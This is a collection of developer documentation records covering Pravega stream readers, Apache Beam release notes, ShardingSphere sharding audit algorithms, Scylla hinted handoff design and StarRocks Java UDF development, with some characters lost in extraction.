Just like the `HelloWorldWriter` example, the key part of the `HelloWorldReader` application is in the `run()` method: ```Java public void run() { StreamManager streamManager = StreamManager.create(controllerURI); final boolean scopeIsNew = streamManager.createScope(scope); StreamConfiguration streamConfig = StreamConfiguration.builder() .scalingPolicy(ScalingPolicy.fixed(1)) .build(); final boolean streamIsNew = streamManager.createStream(scope, streamName, streamConfig); final String readerGroup = UUID.randomUUID().toString().replace(\"-\", \"\"); final ReaderGroupConfig readerGroupConfig = ReaderGroupConfig.builder() .stream(Stream.of(scope, streamName)) .build(); try (ReaderGroupManager readerGroupManager = ReaderGroupManager.withScope(scope, controllerURI)) { readerGroupManager.createReaderGroup(readerGroup, readerGroupConfig); } try (ClientFactory clientFactory = ClientFactory.withScope(scope, controllerURI); EventStreamReader<String> reader = clientFactory.createReader(\"reader\", readerGroup, new JavaSerializer<String>(), ReaderConfig.builder().build())) { System.out.format(\"Reading all the events from %s/%s%n\", scope, streamName); EventRead<String> event = null; do { try { event = reader.readNextEvent(READERTIMEOUTMS); if (event.getEvent() != null) { System.out.format(\"Read event '%s'%n\", event.getEvent()); } } catch (ReinitializationRequiredException e) { //There are certain circumstances where the reader needs to be reinitialized e.printStackTrace(); } } while (event.getEvent() != null); System.out.format(\"No more events from %s/%s%n\", scope, streamName); } } ``` The API `streamManager.createScope()` and `streamManager.createStream()` set up the Scope and Stream just like in the `HelloWorldWriter` application.The API `ReaderGroupConfig` set up the Reader Group as the prerequisite to creating the `EventStreamReader` and using it to read Events from the Stream (`createReader()`,`reader.readNextEvent()`). Any Reader in Pravega belongs to some `ReaderGroup`. A `ReaderGroup` is a grouping of one or more Readers that consume from a Stream in parallel. Before we create a Reader, we need to either create a `ReaderGroup` (or be aware of the name of an existing `ReaderGroup`). This application only uses the basics from Reader" }, { "data": "`ReaderGroup` objects are created from a `ReaderGroupManager` object. The `ReaderGroupManager` object, in turn, is created on a given Scope with a URI to one of the Pravega Controllers, very much like a `ClientFactory` is created. Note that, the `createReaderGroup` is also in a try-with-resources statement to make sure that the `ReaderGroupManager` is properly cleaned up. The `ReaderGroupManager` allows a developer to create, delete and retrieve `ReaderGroup` objects using the name. To create a `ReaderGroup`, the developer needs a name for the Reader Group and a configuration with a set of one or more Streams to read from. The Reader Group's name (alphanumeric) might be meaningful to the application, like \"WebClickStreamReaders\". In cases where we require multiple Readers reading in parallel and each Reader in a separate process, it is helpful to have a human readable name for the Reader Group.In this example, we have one Reader, reading in isolation, so a UUID is a safe way to name the Reader Group. The Reader Group is created via the `ReaderGroupManager` and since the `ReaderGroupManager` is created within the context of a Scope, we can safely conclude that Reader Group names are namespaced by that Scope. 
The developer specifies the Stream which should be the part of the Reader Group and its lower and upper bounds. In the sample application, we start at the beginning of the Stream as follows: ```Java final ReaderGroupConfig readerGroupConfig = ReaderGroupConfig.builder() .stream(Stream.of(scope, streamName)) .build(); ``` Other configuration items, such as Checkpointing are options that will be available through the `ReaderGroupConfig`. The Reader Group can be configured to read from multiple Streams.For example, imagine a situation where there is a collection of Stream of sensor data coming from a factory floor, each machine has its own Stream of sensor data. We can build applications that uses a Reader Group per Stream so that the application reasons about data from exactly one machine.We can build other applications that use a Reader Group configured to read from all of the Streams. To keep it simple, in the sample application the Reader Group only reads from one Stream. We can call `createReaderGroup` with the same parameters multiple times and the same Reader Group will be returned each time after it is initially created (idempotent operation). Note that in other cases, if the developer knows the name of the Reader Group to use and knows it has already been created, they can use `getReaderGroup()` on `ReaderGroupManager` to retrieve the `ReaderGroup` object by name. At this point, we have the Scope and Stream is set up and the `ReaderGroup` object created. Next, we need to create a Reader and start reading Events. First, we create a `ClientFactory` object, the same way we did it in the `HelloWorldWriter` application.Then we use the `ClientFactory` to create an `EventStreamReader` object. The following are the four parameters to create a Reader: Name for the Reader. Reader Group it should be part of. The type of object expected on the Stream. Serializer to convert from the bytes stored in Pravega into the Event objects and a `ReaderConfig`. ```Java EventStreamReader<String> reader = clientFactory.createReader(\"reader\", readerGroup, new JavaSerializer<String>(), ReaderConfig.builder().build())) ``` The name of the Reader can be any valid Pravega naming convention (numbers and letters). Note that the name of the Reader is namespaced within the" }, { "data": "`EventStreamWriter` and `EventStreamReader` uses Java generic types to allow a developer to specify a type safe Reader. In the sample application, we read Strings from the stream and use the standard Java String Serializer to convert the bytes read from the stream into String objects. Note: Pravega allows users to write their own serializer. For more information and example, please refer to . Finally, we use a `ReaderConfig` object with default values. Note that you cannot create the same Reader multiple times. That is, an application may call `createReader()` to add new Readers to the Reader Group. But if the Reader Group already contains a Reader with that name, an exception is thrown. After creating an `EventStreamReader`, we can use it to read Events from the Stream. The `readNextEvent()` operation returns the next Event available on the Stream, or if there is no such Event, blocks for a specified time. After the expiry of the timeout period, if no Event is available for reading, then Null is returned. The null check (`EventRead<String> event = null`) is used to avoid printing out a spurious Null event message to the console and also used to terminate the loop.Note that the Event itself is wrapped in an `EventRead` object. 
It is worth noting that `readNextEvent()` may throw an exception `ReinitializationRequiredException` and the object is reinitialized. This exception would be handled in cases where the Readers in the Reader Group need to reset to a Checkpoint or the Reader Group itself has been altered and the set of Streams being read has been therefore changed. `TruncatedDataException` is thrown when we try to read the deleted data. It is however possible to recover from the later by calling `readNextEvent()` again (it will just skip forward). Thus, the simple `HelloWorldReader` loops, reading Events from a Stream until there are no more Events, and then the application terminates. `BatchClient` is used for applications that require parallel, unordered reads of historical stream data. Using the Batch Reader all the segments in a Stream can be listed and read from. Hence, the Events for a given Routing Key which can reside on multiple segments are not read in order. Obviously this API is not for every application, the main advantage is that it allows for low level integration with batch processing frameworks such as `MapReduce`. To iterate over all the segments in the stream: ```Java //Passing null to fromStreamCut and toStreamCut will result in using the current start of stream and the current end of stream respectively. Iterator<SegmentRange> segments = client.listSegments(stream, null, null).getIterator(); SegmentRange segmentInfo = segments.next(); ``` To read the events from a segment: ```Java SegmentIterator<T> events = client.readSegment(segmentInfo, deserializer); while (events.hasNext()) { processEvent(events.next()); } ``` For a streaming application like Spark, which uses micro-batch reader connectors, needs a streamCut to read Pravega Streams in batches. ```Java StreamCut startingStreamCut = streamManager.fetchStreamInfo(streamScope, streamName).join().getHeadStreamCut(); long approxDistanceToNextOffset = 50 1024 1024; // 50MB in bytes StreamCut nextStreamCut = client.getNextStreamCut(startingStreamCut, approxDistanceToNextOffset); ``` This api provides a streamCut that is a bounded distance from another streamcut. It takes a starting streamCut and an approximate distance in bytes as parameters and return a new stream cut. No segments from the starting streamCut is skipped over. The position for each segment in the new StreamCut is either present inside the segment or at the tail of it. The successors for the respective segments are called only if its position in the startingStreamCut is at the tail." } ]
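Tying the Batch Reader snippets above together, the sketch below drains every segment of a Stream in parallel with a plain `ExecutorService`. It is only a sketch: `client`, `stream`, `deserializer` and `processEvent()` are assumed to be the same objects used in the `listSegments()`/`readSegment()` snippets, and the pool size is illustrative. ```Java import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.concurrent.Callable; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; void readAllSegmentsInParallel() throws InterruptedException { ExecutorService pool = Executors.newFixedThreadPool(4); // illustrative degree of parallelism List<Callable<Void>> jobs = new ArrayList<>(); Iterator<SegmentRange> segments = client.listSegments(stream, null, null).getIterator(); while (segments.hasNext()) { SegmentRange segment = segments.next(); jobs.add(() -> { // Events within one segment are iterated in order, but segments // complete in arbitrary order, which is fine for batch workloads. SegmentIterator<String> events = client.readSegment(segment, deserializer); while (events.hasNext()) { processEvent(events.next()); } return null; }); } pool.invokeAll(jobs); // wait until every segment is drained pool.shutdown(); } ```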
{ "category": "App Definition and Development", "file_name": "beam-2.29.0.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Apache Beam 2.29.0\" date: 2021-04-29 9:00:00 -0700 categories: blog release authors: klk <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> We are happy to present the new 2.29.0 release of Beam. This release includes both improvements and new functionality. See the for this release. <!--more--> For more information on changes in 2.29.0, check out the . Spark Classic and Portable runners officially support Spark 3 (). Official Java 11 support for most runners (Dataflow, Flink, Spark) (). DataFrame API now supports GroupBy.apply (). Added support for S3 filesystem on AWS SDK V2 (Java) () GCP BigQuery sink (file loads) uses runner determined sharding for unbounded data () KafkaIO now recognizes the `partition` property in writing records () Support for Hadoop configuration on ParquetIO () DataFrame API now supports pandas 1.2.x (). Multiple DataFrame API bugfixes (, ) DDL supported in SQL transforms () Upgrade Flink runner to Flink version 1.12.2 () Deterministic coding enforced for GroupByKey and Stateful DoFns. Previously non-deterministic coding was allowed, resulting in keys not properly being grouped in some cases. () To restore the old behavior, one can register `FakeDeterministicFastPrimitivesCoder` with `beam.coders.registry.registerfallbackcoder(beam.coders.coders.FakeDeterministicFastPrimitivesCoder())` or use the `allownondeterministickeycoders` pipeline option. Support for Flink 1.8 and 1.9 will be removed in the next release (2.30.0) (). See a full list of open this version. According to `git shortlog`, the following people contributed to the 2.29.0 release. Thank you to all contributors! Ahmet Altay, Alan Myrvold, Alex Amato, Alexander Chermenin, Alexey Romanenko, Allen Pradeep Xavier, Amy Wu, Anant Damle, Andreas Bergmeier, Andrei Balici, Andrew Pilloud, Andy Xu, Ankur Goenka, Bashir Sadjad, Benjamin Gonzalez, Boyuan Zhang, Brian Hulette, Chamikara Jayalath, Chinmoy Mandayam, Chuck Yang, dandy10, Daniel Collins, Daniel Oliveira, David Cavazos, David Huntsperger, David Moravek, Dmytro Kozhevin, Emily Ye, Esun Kim, Evgeniy Belousov, Filip Popi, Fokko Driesprong, Gris Cuevas, Heejong Lee, Ihor Indyk, Ismal Meja, Jakub-Sadowski, Jan Lukavsk, John Edmonds, Juan Sandoval, , Kenneth Jung, Kenneth Knowles, KevinGG, Kiley Sok, Kyle Weaver, MabelYC, Mackenzie Clark, Masato Nakamura, Milena Bukal, Miltos, Minbo Bae, Mira Vuslat Baaran, mynameborat, Nahian-Al Hasan, Nam Bui, Niel Markwick, Niels Basjes, Ning Kang, Nir Gazit, Pablo Estrada, Ramazan Yapparov, Raphael Sanamyan, Reuven Lax, Rion Williams, Robert Bradshaw, Robert Burke, Rui Wang, Sam Rohde, Sam Whittle, Shehzaad Nakhoda, Shehzaad Nakhoda, Siyuan Chen, Sonam Ramchand, Steve Niemitz, sychen, Sylvain Veyri, Tim Robertson, Tobias Kaymak, Tomasz Szerszen, Tomasz Szersze, Tomo Suzuki, Tyson Hamilton, Udi Meiri, Valentyn Tymofieiev, Yichi Zhang, Yifan Mai, Yixing Zhang, Yoshiki Obata" } ]
{ "category": "App Definition and Development", "file_name": "2022_10_14_ShardingSphere_5.2.0_Audit_for_sharding_intercepts_unreasonable_requests_in_multi-shards_scenarios.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \" ShardingSphere 5.2.0: Audit for sharding intercepts unreasonable requests in multi-shards scenarios\" weight = 76 chapter = true +++ Thanks to our continuous review of the 's community feedback that we use to develop features such as data sharding and read/write splitting, we found that some users create a large number of shards when using the data sharding feature. In such cases, there can be 1,000 physical tables corresponding to a sharding logical table, which largely disturbs users. For instance, a `SELECT * FROM t_order` statement will lead to a full-route, which is obviously not the case for . This SQL can be placed in another Proxy to avoid blocking other requests. However, if users are not familiar with Proxy, or write a `where` condition and don't know that sharding is not supported in this condition, a full-route is still required. A full route can lower the performance of Proxy and even result in the failure of a reasonable request. Imagine that there are 1000 shards in a physical database, if they are executed in parallel, 1,000 connections are needed and if in serial, the request can lead to a timeout. In this regard, community users requested whether the unreasonable request can be intercepted directly. We've considered the issue for a while. If we simply block the full-route operation, we just need to check it in the code and add a switch to the configuration file. On the other hand, if the user later needs to set a table to read-only or requires the update operation to carry a `limit`, does that mean we need to change the code and configuration again? This obviously goes against the pluggable logic of Proxy. In response to the above problems, the provides users with SQL audit for the sharding function. The audit can either be an interception operation or a statistical operation. Similar to the sharding and unique key generation algorithms, the audit algorithm is also plugin-oriented, user-defined, and configurable. Next, we will elaborate on the implementation logic for data sharding's audit, with specific SQL examples. The entrance to Apache ShardingSphere's audit is in the `org.apache.shardingsphere.infra.executor.check.SQLCheckEngine` class, which will invoke the `check` method of the `SQLChecker` interface. Currently, ShardingSphere audit contains audit for permission (verify username and password) and audit for sharding. Here we focus on the parent interface implemented in `ShardingAuditChecker` of audit for sharding. We can learn its working principles quickly through viewing the `check` code of `org.apache.shardingsphere.sharding.checker.audit.ShardingAuditChecker`. ```java public interface ShardingAuditAlgorithm extends ShardingSphereAlgorithm { / Sharding audit algorithm SQL check. * @param sqlStatementContext SQL statement context @param parameters SQL parameters @param grantee grantee @param database database @return SQL check result */ SQLCheckResult check(SQLStatementContext<?> sqlStatementContext, List<Object> parameters, Grantee grantee, ShardingSphereDatabase database); } ``` This method obtains the audit strategies of all the sharding tables involved and invokes the audit algorithms configured in each sharding table audit" }, { "data": "If an audit algorithm fails to pass, an exception is displayed to the user. Some users may wonder what `disableAuditNames` does here. The audit for sharding also allows users to skip this process. 
In some cases, users may need to execute SQL that should have been blocked by the audit, and they are aware of the impact of this SQL. For this reason, we provide `Hint: disableAuditNames` to skip audit interception, which will be described with practical examples later on. The Proxy Administrators can configure `allowHintDisable` to control whether to allow users to skip this process. The default value is `true`, indicating that Hint-based skip is allowed. The audit for sharding algorithm interface `org.apache.shardingsphere.sharding.spi.ShardingAuditAlgorithm` is inherited from SPI class `ShardingSphereAlgorithm`. It inherits `type` and `props` properties and defines its own `check` method. If you're looking to customize your own audit algorithm, just implement the interface and add it to `INF.services`. ```java public interface ShardingAuditAlgorithm extends ShardingSphereAlgorithm { / Sharding audit algorithm SQL check. * @param sqlStatementContext SQL statement context @param parameters SQL parameters @param grantee grantee @param database database @return SQL check result */ SQLCheckResult check(SQLStatementContext<?> sqlStatementContext, List<Object> parameters, Grantee grantee, ShardingSphereDatabase database); } ``` Apache ShardingSphere implements a general audit for sharding algorithm `org.apache.shardingsphere.sharding.algorithm.audit.DMLShardingConditionsShardingAuditAlgorithm`, namely the above-mentioned SQL statement that intercepts the full-route. The algorithm makes decisions by determining whether the sharding condition is `null`. Of course, it won't intercept broadcast tables and non-sharding tables. ```java public final class DMLShardingConditionsShardingAuditAlgorithm implements ShardingAuditAlgorithm { @Getter private Properties props; @Override public void init(final Properties props) { this.props = props; } @SuppressWarnings({\"rawtypes\", \"unchecked\"}) @Override public SQLCheckResult check(final SQLStatementContext<?> sqlStatementContext, final List<Object> parameters, final Grantee grantee, final ShardingSphereDatabase database) { if (sqlStatementContext.getSqlStatement() instanceof DMLStatement) { ShardingRule rule = database.getRuleMetaData().getSingleRule(ShardingRule.class); if (rule.isAllBroadcastTables(sqlStatementContext.getTablesContext().getTableNames()) || sqlStatementContext.getTablesContext().getTableNames().stream().noneMatch(rule::isShardingTable)) { return new SQLCheckResult(true, \"\"); } ShardingConditionEngine shardingConditionEngine = ShardingConditionEngineFactory.createShardingConditionEngine(sqlStatementContext, database, rule); if (shardingConditionEngine.createShardingConditions(sqlStatementContext, parameters).isEmpty()) { return new SQLCheckResult(false, \"Not allow DML operation without sharding conditions\"); } } return new SQLCheckResult(true, \"\"); } @Override public String getType() { return \"DMLSHARDINGCONDITIONS\"; } } ``` Here we'd like to introduce another audit for sharding algorithm: `LimitRequiredShardingAuditAlgorithm`. This algorithm can intercept SQL without carrying `limit` in the `update` and `delete` operations. As this algorithm is less universal, it is not currently integrated into Apache ShardingSphere. As you can see, it is very easy to implement a custom algorithm, which is why we need to design the audit for sharding framework. Thanks to its plugin-oriented architecture, ShardingSphere boasts great scalability. 
```java public final class LimitRequiredShardingAuditAlgorithm implements ShardingAuditAlgorithm { @Getter private Properties props; @Override public void init(final Properties props) { this.props = props; } @SuppressWarnings({\"rawtypes\", \"unchecked\"}) @Override public SQLCheckResult check(final SQLStatementContext<?> sqlStatementContext, final List<Object> parameters, final Grantee grantee, final ShardingSphereDatabase database) { if (sqlStatementContext instanceof UpdateStatementContext && !((MySQLUpdateStatement) sqlStatementContext.getSqlStatement()).getLimit().isPresent()) { return new SQLCheckResult(false, \"Not allow update without limit\"); } if (sqlStatementContext instanceof DeleteStatementContext && !((MySQLDeleteStatement)" }, { "data": "{ return new SQLCheckResult(false, \"Not allow delete without limit\"); } return new SQLCheckResult(true, \"\"); } @Override public String getType() { return \"LIMIT_REQUIRED\"; } } ``` Audit for sharding requires you to configure audit strategy for logical tables. To help you quickly get started, its configuration is the same with that of the sharding algorithm and the sharding key value generator. There is an algorithm definition and strategy definition, and default audit strategy is also supported. If the audit strategy is configured in the logical table, it takes effect only for the logical table. If `defaultAuditStrategy` is configured in the logical table, it takes effect fo all the logical tables under the sharding rule. `Auditors` are similar to `ShardingAlgorithms`, `auditStrategy` to `databaseStrategy`, and `defaultAuditStrategy` to `defaultDatabaseStrategy` or `defaultTableStrategy`. Please refer to the following configuration. Only the configuration of audit for sharding is displayed. You need to configure the sharding algorithm and data source by yourself. ```sql rules: !SHARDING tables: t_order: actualDataNodes: ds${0..1}.torder_${0..1} auditStrategy: auditorNames: shardingkeyrequired_auditor allowHintDisable: true defaultAuditStrategy: auditorNames: shardingkeyrequired_auditor allowHintDisable: true auditors: shardingkeyrequired_auditor: type: DMLSHARDINGCONDITIONS ``` Step 1: Execute a query operation. An error is displayed as the audit strategy for intercepting the full-database route is configured. ```mysql mysql> select * from t_order; ERROR 13000 (44000): SQL check failed, error message: Not allow DML operation without sharding conditions ``` Step 2: Add `HINT.` The name of the `HINT` is `/ ShardingSphere hint: disableAuditNames /`and `disableAuditNames` is followed by the `auditorsNames` configured in the preceding command. If there are multiple names, separate them with spaces such as `/ ShardingSphere hint: disableAuditNames=auditName1 auditName2/`. After using `HINT`, we can see that the SQL operation is successfully executed. ```mysql mysql> / ShardingSphere hint: disableAuditNames=sharding_key_required_auditor / select * from t_order; +-+++--+ | orderid | userid | address_id | status | +-+++--+ | 30 | 20 | 10 | 20 | | 32 | 22 | 10 | 20 | +-+++--+ 2 rows in set (0.01 sec) ``` Note: If you are using MySQL terminal to connect to Proxy directly, you need to add the `-c` property otherwise, `HINT `comments will be filtered out of the MySQL terminal and will not be parsed by Proxy on the backend. ```sql props: proxy-hint-enabled: truemysql -uroot -proot -h127.0.0.1 -P3307 -c ``` Currently, as you can see from the Apache ShardingSphere 5.2.0 supports the following with audit for sharding function. 
```sql CREATE SHARDING AUDITOR ALTER SHARDING AUDITOR SHOW SHARDING AUDIT ALGORITHMS ``` The following DistSQL will be supported in future releases: ```sql DROP SHARDING AUDITOR SHOW UNUSED SHARDING AUDIT ALGORITHMS CREATE SHARDING TABLE RULE # including AUDIT_STRATEGY ``` This post introduced how audit for sharding works with specific examples. I believe you already have basic understanding of this function, and you can use it whenever you need or use custom algorithm. You are also welcome to submit general algorithms to the community. If you have any ideas you'd like to contribute or you encounter any issues with your ShardingSphere, feel free to post them on . Huang Ting, a technology engineer at Financial Technology (FiT) & . He is mainly responsible for the R&D of Proxy-related audit for sharding and transaction features." } ]
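As a supplement to the `LimitRequiredShardingAuditAlgorithm` example above, here is roughly how such a custom auditor would be wired in. Treat it as a sketch under stated assumptions rather than an official recipe: the algorithm class is registered through the standard Java SPI file `META-INF/services/org.apache.shardingsphere.sharding.spi.ShardingAuditAlgorithm` (a single line containing the implementation's fully qualified class name, for example the hypothetical `com.example.audit.LimitRequiredShardingAuditAlgorithm`), the packaged jar is placed where the Proxy can load it (typically its `ext-lib` directory), and the auditor is then referenced by its `getType()` value. The YAML below simply mirrors the audit configuration example shown earlier in this post. ```yaml rules: - !SHARDING tables: t_order: actualDataNodes: ds_${0..1}.t_order_${0..1} auditStrategy: auditorNames: - limit_required_auditor allowHintDisable: true auditors: limit_required_auditor: type: LIMIT_REQUIRED ```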
{ "category": "App Definition and Development", "file_name": "hinted_handoff_design.md", "project_name": "Scylla", "subcategory": "Database" }
[ { "data": "Hinted Handoff is a feature that allows replaying failed writes. The mutation and the destination replica are saved in a log and replayed later according to the feature configuration. hintedhandoffenabled: Enables or disables the Hinted Handoff feature completely or enumerate DCs for which hints are allowed. maxhintwindowinms: Don't generate hints if the destination Node has been down for more than this value. The hints generation should resume once the Node is seen up. hintsdirectory: Directory where scylla will store hints. By default `$SCYLLAHOME/hints` hintscompression_: Compression to apply to hints files. By default, hints files are stored uncompressed. We should define the fairness configuration between the regular WRITES and hints WRITES. Since we don't have either CPU scheduler or (and) Network scheduler at the moment we can't give any guarantee regarding the runtime and/or networking bandwidth fairness. Once we have tools to define it we should give the hints sender some low runtime priority and some small share of the bandwidth. Once the WRITE mutation fails with a timeout we create a hintsqueue_ for the target node. The queue is specified by a destination node host ID. Each hint is specified by: Mutation. Destination node. Hints are appended to the hintsqueue until (all this should be done using the existing or slightly modified commitlog_ API): The destination node is DOWN for more than maxhintwindowinms time. The total size of hint files is more than 10% of the total disk partition size where hintsdirectory_ is located. We are going to ensure storing a new hint to the specific destination node if there are no pending hints to it. As long as hints are appended to the queue the files are closed and flushed to the disk once they reach the maximum allowed size (32MB) or when the queue is forcefully flushed (see \"Hints sending\" below). We are going to reuse the commitlog infrastructure for writing hints to disk - it provides both the internal buffering and the memory consumption control. Hints to the specific destination are stored under the hintsdirectory_/\\<shard ID>/\\<node host ID> directory. A new hint is going to be dropped when there are more than 10MB \"in progress\" (yet to be stored) hints per-shard and when there are \"in progress\" hints to the destination the current hint is aimed to. If there are no \"in progress\" hints to the current destination the new hint won't be dropped due to the per-shard memory limitation. A hint is going to be dropped if the disk space quota (to the whole node it's 10% of the total disk space of the disk partition where hintsdirectory_ is located) has been depleted and when there are pending (already stored) hints to the current destination. Disk quota is divided equally between all present shards. If there are no pending hints to the current destination a new hint won't be dropped due to a disk space limitation. If a new hint is dropped the corresponding metrics counter is increased. When node boots all present hints files are redistributed equally between all present shards. Hints are sent from each shard by each hintsqueue_ independently. Each shard sends the hints that it owns (according to the hint file location). Hints sending is triggered by the following events: Timer: every X seconds (every" }, { "data": "For each queue: Forcefully close the queues. 
If the destination node is ALIVE or decommissioned and there are pending hints to it start sending hints to it: If hint's timestamp is older than mutation.gcgraceseconds() from now() drop this hint. The hint's timestamp is evaluated as hintsfile_ last modification time minus the hints timer period (10s). Hints are sent using a MUTATE verb: Each mutation is sent in a separate message. If the node in the hint is a valid mutation replica - send the mutation to it. Otherwise execute the original mutation with CL=ALL. Once the complete hints file is processed it's deleted and we move to the next file. We are going to limit the parallelism during hints sending. The new hint is going to be sent out unless: The total size of in-flight (being sent) hints is greater or equal to 10% of the total shard memory. The number of in-flight hints is greater or equal to 128 - this is needed to limit the collateral memory consumption in case of small hints (mutations). If there is a hint that is bigger than the memory limit above we are going to send it but won't allow any additional in-flight hints while it's being sent. Local node is decommissioned (see \"When the current node is decommissioned\" below). Send all pending hints out: If the destination node is not ALIVE or the mutation times out - drop the hint and move on to the next one. Streaming is performed using a new HINT_STREAMING verb: When node is decommissioned it would stream its hints to other nodes of the cluster (only in a Local data center): Shard X would send its hints to the node[Yx], where Yx = X mod N, where N is number of nodes in the cluster without the node that is being decommissioned. Receiver distributes received hints equally among local shards: pushes them to the corresponding hintqueue_s (see \"Hints generation\" above). Scylla is moving away from using IP addresses to identify nodes in its internals and that role is being taken over by host IDs. Hinted Handoff is no exception to that and the module uses the new type now. However, to prepare for upgrading Scylla to a new version from one where Hinted Handoff still used IP addresses, a migration process has been introduced. Its purpose is to map existing hint directories on disk so that their names all represent valid host IDs. When the whole cluster starts using a version of Scylla that supports host-ID based Hinted Handoff, the module is suspended (i.e. no new hints are accepted and no hints are being sent) and we start renaming hint directories to host IDs. Hinted Handoff does NOT work until the migration process has finished. As a side effect, all sync points that were created up to then will be canceled, i.e. an exception will be issued instead of a resolved future. A major consequence of the migration process is also possible data loss. If there is no corresponding host ID for a given IP address in `locator::token_metadata` or if renaming a directory fails, the directory shall be removed with all of its contents. In that case, a warning will be issued. Migration won't be started if a node is being stopped or drained." } ]
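For reference, a minimal scylla.yaml fragment covering the parameters listed at the top of this note might look as follows. This is a sketch only: the option names are the conventional spellings of the parameters above (their underscores were lost in the list), and the values are illustrative rather than defaults taken from this document. ```yaml hinted_handoff_enabled: true             # or a list of DCs for which hints may be generated max_hint_window_in_ms: 10800000          # stop generating hints for a node that is down longer than this hints_directory: /var/lib/scylla/hints   # defaults to $SCYLLA_HOME/hints ```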
{ "category": "App Definition and Development", "file_name": "JAVA_UDF.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" From v2.2.0 onwards, you can compile user-defined functions (UDFs) to suit your specific business needs by using the Java programming language. From v3.0 onwards, StarRocks supports global UDFs, and you only need to include the `GLOBAL` keyword in the related SQL statements (CREATE/SHOW/DROP). This topic how to develop and use various UDFs. Currently, StarRocks supports scalar UDFs, user-defined aggregate functions (UDAFs), user-defined window functions (UDWFs), and user-defined table functions (UDTFs). You have installed , so you can create and compile Java projects. You have installed JDK 1.8 on your servers. The Java UDF feature is enabled. You can set the FE configuration item `enable_udf` to `true` in the FE configuration file fe/conf/fe.conf to enable this feature, and then restart the FE nodes to make the settings take effect. For more information, see . You need to create a Maven project and compile the UDF you need by using the Java programming language. Create a Maven project, whose basic directory structure is as follows: ```Plain project |--pom.xml |--src | |--main | | |--java | | |--resources | |--test |--target ``` Add the following dependencies to the pom.xml file: ```XML <?xml version=\"1.0\" encoding=\"UTF-8\"?> <project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"> <modelVersion>4.0.0</modelVersion> <groupId>org.example</groupId> <artifactId>udf</artifactId> <version>1.0-SNAPSHOT</version> <properties> <maven.compiler.source>8</maven.compiler.source> <maven.compiler.target>8</maven.compiler.target> </properties> <dependencies> <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.76</version> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-dependency-plugin</artifactId> <version>2.10</version> <executions> <execution> <id>copy-dependencies</id> <phase>package</phase> <goals> <goal>copy-dependencies</goal> </goals> <configuration> <outputDirectory>${project.build.directory}/lib</outputDirectory> </configuration> </execution> </executions> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-assembly-plugin</artifactId> <version>3.3.0</version> <executions> <execution> <id>make-assembly</id> <phase>package</phase> <goals> <goal>single</goal> </goals> </execution> </executions> <configuration> <descriptorRefs> <descriptorRef>jar-with-dependencies</descriptorRef> </descriptorRefs> </configuration> </plugin> </plugins> </build> </project> ``` Use the Java programming language to compile a UDF. A scalar UDF operates on a single row of data and returns a single value. When you use a scalar UDF in a query, each row corresponds to a single value in the result set. Typical scalar functions include `UPPER`, `LOWER`, `ROUND`, and `ABS`. Suppose that the values of a field in your JSON data are JSON strings rather than JSON objects. When you use an SQL statement to extract JSON strings, you need to run `GETJSONSTRING` twice, for example, `GETJSONSTRING(GETJSONSTRING('{\"key\":\"{\\\\\"k0\\\\\":\\\\\"v0\\\\\"}\"}', \"$.key\"), \"$.k0\")`. To simplify the SQL statement, you can compile a scalar UDF that can directly extract JSON strings, for example, `MYUDFJSON_GET('{\"key\":\"{\\\\\"k0\\\\\":\\\\\"v0\\\\\"}\"}', \"$.key.k0\")`. 
```Java package com.starrocks.udf.sample; import com.alibaba.fastjson.JSONPath; public class UDFJsonGet { public final String evaluate(String obj, String key) { if (obj == null || key == null) return null; try { // The JSONPath library can be fully expanded even if the values of a field are JSON strings. return JSONPath.read(obj, key).toString(); } catch (Exception e) { return null; } } } ``` The user-defined class must implement the method described in the following table. NOTE The data types of the request parameters and return parameters in the method must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | -- | | | TYPE1 evaluate(TYPE2, ...) | Runs the" }, { "data": "The evaluate() method requires the public member access level. | A UDAF operates on multiple rows of data and returns a single value. Typical aggregate functions include `SUM`, `COUNT`, `MAX`, and `MIN`, which aggregate multiple rows of data specified in each GROUP BY clause and return a single value. Suppose that you want to compile a UDAF named `MYSUMINT`. Unlike the built-in aggregate function `SUM`, which returns BIGINT-type values, the `MYSUMINT` function supports only request parameters and returns parameters of the INT data type. ```Java package com.starrocks.udf.sample; public class SumInt { public static class State { int counter = 0; public int serializeLength() { return 4; } } public State create() { return new State(); } public void destroy(State state) { } public final void update(State state, Integer val) { if (val != null) { state.counter+= val; } } public void serialize(State state, java.nio.ByteBuffer buff) { buff.putInt(state.counter); } public void merge(State state, java.nio.ByteBuffer buffer) { int val = buffer.getInt(); state.counter += val; } public Integer finalize(State state) { return state.counter; } } ``` The user-defined class must implement the methods described in the following table. NOTE The data types of the request parameters and return parameters in the methods must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | | | | State create() | Creates a state. | | void destroy(State) | Destroys a state. | | void update(State, ...) | Updates a state. In addition to the first parameter `State`, you can also specify one or more request parameters in the UDF declaration. | | void serialize(State, ByteBuffer) | Serializes a state into the byte buffer. | | void merge(State, ByteBuffer) | Deserializes a state from the byte buffer, and merges the byte buffer into the state as the first parameter. | | TYPE finalize(State) | Obtains the final result of the UDF from a state. | During compilation, you must also use the buffer class `java.nio.ByteBuffer` and the local variable `serializeLength`, which are described in the following table. | Class and local variable | Description | | | | | java.nio.ByteBuffer() | The buffer class, which stores intermediate results. Intermediate results may be 